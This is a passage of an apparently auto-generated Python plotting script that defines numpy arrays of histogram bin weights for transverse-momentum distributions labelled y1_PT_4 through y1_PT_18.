61273,0.0,0.00142246679191,0.0,0.000948311061273,0.000948311061273,0.000474155730637]) # Creating weights for histo: y1_PT_4 y1_PT_4_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_5 y1_PT_5_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,1.0521138287,0.0,0.0,0.0,0.0,0.0,1.05462838872,1.0529581672,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_6 y1_PT_6_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.229973216998,0.460530808072,0.230829220503,0.0,0.0,1.61317793421,1.15240274035,0.920477165217,1.15054256484,1.38060373767,1.38153171202,2.07437004409,1.61294776583,2.53322550302,1.61266341758,1.61290626636,1.15165229152,0.92203185848,1.84261315664,0.461330825713,0.921052394039,0.920601279385,1.15223251565,0.230176948675,0.0,0.229694017758,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_7 y1_PT_7_weights = 
numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0830760384254,0.165847358816,0.249180259041,0.526419736448,0.692429706441,0.443009858469,0.581384006977,0.66435071468,0.69239546846,1.13512642202,1.05227743143,0.664569222247,0.858600864234,1.02435385702,1.35711126004,1.38487826301,1.57805703303,1.55083283672,1.77186208883,1.10708243764,1.4401472131,1.27387103318,1.24615134788,0.858782825641,0.830925419018,0.99694846869,0.914132561984,0.498457692399,0.720048601283,0.692114640072,0.442941382506,0.415236315666,0.443027169808,0.470818408646,0.249193992704,0.22144518588,0.0554608751386,0.0553348485911,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_8 y1_PT_8_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0403440227356,0.0604268599935,0.0503930720299,0.0805576172232,0.201731370047,0.23190432566,0.151319280518,0.251963175625,0.161288843462,0.131148716398,0.272229434054,0.252114878715,0.272327373569,0.262162659771,0.231659658917,0.33279780269,0.272065655399,0.362996972596,0.322599774893,0.282302761911,0.473878459665,0.443542696297,0.272235016728,0.403350176402,0.453632226044,0.504217439138,0.51428906792,0.504162158533,0.363021123728,0.514233665952,0.403116007514,0.40325824433,0.362891994058,0.262098459024,0.29222153466,0.282312410228,0.241781167675,0.191524907559,0.151294279849,0.121034974838,0.0907700264722,0.100860405756,0.120967982754,0.0908129887871,0.0302123680751,0.0504337587985,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_9 y1_PT_9_weights = 
numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00565805878494,0.00566815817425,0.0169619455134,0.0254827021693,0.0395888751073,0.0311268526523,0.039601994695,0.0395840658743,0.0622763356315,0.0594327323394,0.0650868898745,0.0764076320028,0.107472891846,0.0735744936017,0.107520253173,0.0990339960309,0.0650961620757,0.0933481360318,0.0792254193322,0.107526370517,0.113163291761,0.12163508273,0.116001701082,0.147124671721,0.101859324238,0.124483418308,0.15558919113,0.130141269334,0.130105450166,0.149947576075,0.130131766289,0.164142969903,0.158502432116,0.141429577995,0.132958479555,0.133006494938,0.164064752538,0.178211476929,0.169757306989,0.144283800073,0.135779652585,0.149962773251,0.14993199416,0.115973384318,0.0792300361959,0.138608289544,0.0849048926699,0.107529525374,0.10464279288,0.0848301764259,0.079236807596,0.079200565216,0.0792082984627,0.073535904316,0.0424278615358,0.0735778408278,0.0594086092266,0.039614998861,0.0481249943771,0.0480753246186,0.0339358025352,0.0367818027491,0.0339657352014,0.0339329516218,0.031120396738,0.0254535774542,0.016975253623,0.0169689439093,0.0226350321897,0.0311249751278,0.00566387988057,0.0112954801892,0.0141608904675,0.0113257014094,0.00282343644685,0.0226373714006,0.00565228001056,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_10 y1_PT_10_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00153160945944,0.0,0.00458244334204,0.0045658937295,0.00152859678726,0.00918261301094,0.0122044059151,0.013709548754,0.00915009505437,0.0137175234745,0.0213161679649,0.0106349584744,0.00914642432006,0.0121850775555,0.00914380861174,0.0137339100483,0.0198227686403,0.00915190265768,0.00610556179168,0.019747404578,0.0137420856136,0.0106918613541,0.00759689714047,0.0152843847429,0.0197562535641,0.0152490124271,0.0197859313388,0.0137529548623,0.0091209501092,0.0121805762688,0.0136781815201,0.0136842659365,0.0106551776398,0.00606435906912,0.00914706584202,0.00608507562081,0.00914955159193,0.00911946858335,0.0106546235445,0.00912457122302,0.00607256180755,0.00456727010718,0.0106189145182,0.00763302675935,0.00305141278823,0.00455130885179,0.00611483491481,0.00610244869709,0.00304593326917,0.00152104502231,0.0136897832616,0.0122018421901,0.0122179688471,0.00762967146954,0.0152388756712,0.012167875788,0.0273782669391,0.0167605468568,0.0198326218505,0.0121649694455,0.00761867580678,0.0152004552401,0.00917681922882,0.0151910391627,0.00609524427552,0.0137274711999,0.0106473695024,0.00760823187653,0.0106939324186,0.0091286211996,0.0106218043207,0.00911450417216,0.00454035690231,0.00608897082873,0.00613406048913,0.00305897873046,0.00306009400989,0.00152391119593,0.00760878715336,0.0045914163794,0.0,0.00610525107294,0.0,0.00303492697345,0.00764813737788,0.00152437432043,0.0,0.0,0.00455267577796,0.00152036569427,0.0,0.0,0.0,0.00152202207325,0.00458045970416,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_11 y1_PT_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000360770723555,0.000722646559896,0.000721875183778,0.000541571889025,0.00108312182676,0.000901843817599,0.00108299551055,0.00180425952413,0.000902478864638,0.00126467403452,0.000723563122633,0.00162515507803,0.00234822757003,0.00234621883421,0.00180718212691,0.00108281681933,0.00162423581952,0.00252887322792,0.00252739440401,0.00198544202591,0.00397351897714,0.00379219436962,0.00162462170014,0.00126370740743,0.00180512833318,0.00162462092992,0.00270821220625,0.00162549397518,0.00126294373352,0.0025275461375,0.00307150763652,0.00162608935585,0.000542240440668,0.00234960164391,0.00180746518305,0.00198440184274,0.00198667746006,0.00252869992824,0.00234542011526,0.00180547185165,0.000180814220712,0.000541953918536,0.00126246273064,0.00180458994885,0.000541966627179,0.00072244437694,0.000902466155995,0.000360475613461,0.000902352163318,0.00126488314946,0.00180722679971,0.000540151216783,0.000722341552465,0.000902330597136,0.000902885156103,0.000361027784743,0.00108339448492,0.000902741509926,0.000903111986125,0.000902799276485,0.000180057632833,0.000721313307714,0.000542386782618,0.00126429855188,0.0,0.000360961930866,0.00108348691141,0.000541583442337,0.000721823578985,0.00108354121198,0.000722184427424,0.000903285285802,0.00180413551859,0.000903120073443,0.000902358325085,0.00162493941621,0.000902201585154,0.0016241460888,0.00180617198235,0.00144490723918,0.000722291873224,0.00108360359986,0.00162598345049,0.000902796580713,0.0010830417238,0.000541162516677,0.00126447878355,0.000541314250172,0.000722412412777,0.000361264858701,0.00126233102288,0.000541286522223,0.000361461496068,0.000722265685717,0.000360742918585,0.000542143392849,0.000361088170053,0.000541451349472,0.000542489992204,0.00144536590566,0.000180793501773,0.000542069066543,0.000180366953501,0.000541593455207,0.000181029497422,0.0,0.000360738104705,0.000722182886982,0.000722909590295,0.000542037872601,0.000541291528659,0.00018059293628,0.0,0.000360463405461,0.0,0.0,0.000361843718134,0.000542386782618]) # Creating weights for histo: y1_PT_12 y1_PT_12_weights = numpy.array([0.0,0.0,0.0,0.0242945760233,0.0121313846429,0.0121753353338,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_13 y1_PT_13_weights = 
numpy.array([0.0,0.0,0.0,0.0,0.0,0.010029957153,0.03010776731,0.100374402715,0.140581268548,0.170818356211,0.200754011796,0.120572665874,0.140442803998,0.100357791927,0.0703121828455,0.0501908168896,0.0200707939587,0.0100369733513,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_14 y1_PT_14_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0440276096061,0.0714206545306,0.192491248692,0.253039749453,0.247494488292,0.330030772449,0.401648425884,0.401435095043,0.473015940681,0.462023978751,0.48414400208,0.451055986579,0.429078156725,0.318922658763,0.269476624576,0.258499978915,0.247451952129,0.280548052346,0.242025889727,0.19804715405,0.192533825481,0.13204086143,0.104476737441,0.0880095547931,0.0385034458943,0.0549958455389,0.0110089276429,0.00549249925614,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_15 y1_PT_15_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0147928195996,0.055277388981,0.104600308931,0.14506227158,0.160884779743,0.186510032062,0.212205349218,0.224992182058,0.263478500671,0.288098074058,0.305923763182,0.318761381004,0.308906248552,0.339479769893,0.344402706549,0.3266523732,0.362174363979,0.279305698529,0.303940583569,0.282253872972,0.265457872413,0.231895332195,0.199337228341,0.19340660861,0.174670958423,0.133246085253,0.122358458437,0.119387076019,0.102607709846,0.0848683992833,0.0750164333773,0.0365294974881,0.0365292409578,0.0365142419519,0.0217103715081,0.0128268034666,0.00493401956619,0.000986136934466,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_16 y1_PT_16_weights = 
numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00655364752036,0.0181514449771,0.0297468217899,0.0360501787234,0.0509137449993,0.0499039163463,0.0577255171907,0.066038648801,0.0738568087299,0.0819275558566,0.0955366163861,0.0899952621744,0.0920037164999,0.0907503830654,0.101323555933,0.0932744145541,0.102847001228,0.110151344462,0.111929977646,0.109906239254,0.115712263878,0.11367944307,0.113932670439,0.114955542562,0.10966073394,0.112920121062,0.106624246119,0.09982691777,0.0894781646067,0.0884859406373,0.0768790127515,0.0640205118995,0.0557069001615,0.0519272946422,0.0431037872525,0.0408405451437,0.0330231334138,0.0289966422135,0.0279884499959,0.0184012674394,0.0161336641704,0.0118504366684,0.0115988977495,0.00756123557724,0.00479147871621,0.00378240986538,0.00100786533064,0.000758340947634,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_17 y1_PT_17_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00171665066365,0.00716273325226,0.00830507681594,0.00945558160472,0.0111664415277,0.0154553187848,0.0163181011473,0.0188913615159,0.0183228251609,0.0234725751958,0.0254910962088,0.0254800686071,0.0312134117224,0.0274758545645,0.0309038290503,0.0303437708515,0.0306315982549,0.0369403562293,0.0352326276253,0.0372333924999,0.0415200002506,0.0403831874841,0.0461044232325,0.0392320278377,0.0398048832534,0.039493021077,0.0472134820349,0.0412299833233,0.0392242795228,0.0389307333631,0.0366414212416,0.0429633163589,0.0389654758073,0.0432280287894,0.0415058833207,0.0357891066025,0.0375015941716,0.0320558385119,0.0251971301404,0.0354899916539,0.0277622922702,0.0300570732024,0.0297856622287,0.0232101022783,0.0214704106256,0.0208983150446,0.0165961606751,0.0183217154023,0.0143321030612,0.0137460205222,0.0120329630771,0.0163090831086,0.0111631222496,0.0105836382755,0.00914648882607,0.00858850317652,0.00858030096033,0.00715637263557,0.00915398119663,0.0048749268033,0.00544004190234,0.00401457191286,0.00515435903251,0.00516097059463,0.00257645067476,0.00543843625154,0.00286371420083,0.00200489497642,0.00314284349593,0.00171761845318,0.00114259850823,0.00142809641829,0.000860972956021,0.000287297018784,0.00114363028384,0.000574942861707,0.000286470898449,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_18 y1_PT_18_weights = 
numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000280735777845,0.00053999532933,0.00103501986161,0.00105864754127,0.00179284197834,0.00218198201648,0.00252738762862,0.00216105507415,0.0026785073775,0.00282948798224,0.003067456302,0.0032595372337,0.00356419205566,0.00388644148559,0.00356177337857,0.00412528071351,0.00369005840171,0.00392831381102,0.00436381147733,0.0043617033599,0.00462228008663,0.0041470739538,0.00479533850655,0.00431961225965,0.00425333438857,0.00446963645803,0.00397433489481,0.00468792929446,0.00364724140496,0.00438564285652,0.00418749239068,0.00421062719834,0.00444959048248,0.00345656532608,0.00440292690485,0.00377839271342,0.00358037007577,0.0034970709376,0.00321713012539,0.003323728781,0.00317454238118,0.00289466024421,0.00349917779771,0.00336791207255,0.00300061975884,0.00284931434476,0.00295568374783,0.00306595170128,0.00315195031946,0.00313036369983,0.00321741847227,0.00343134461375,0.00321634220078,0.00306740097963,0.00315342390612,0.0033254601196,0.00306744456695,0.00362754496618,0.00287136366054,0.00276303618099,0.00241924078498,0.00252407289685,0.002721635353,0.00194406273244,0.00237588523339,0.00174825215123,0.00161970099398,0.00192257921359,0.00151192589988,0.00159871286177,0.00164144729408,0.0014257470649,0.00151201600828,0.00125266307934,0.000927343258086,0.00101509207475,0.00103537191304,0.000734455122773,0.000691302000742,0.000561617992317,0.000756170827921,0.000453726805065,0.000799405676173,0.00047389390307,0.000691456651902,0.000451930923709,0.000324319115094,0.00028085317023,0.000345496181568,0.00017266227825,0.000345540020352,0.000194444202594,0.000172806116402,0.000108108914291,0.000107964573209,8.63712059296e-05,6.47075960096e-05,0.0,0.0,0.0,0.0,0.0,0.0,0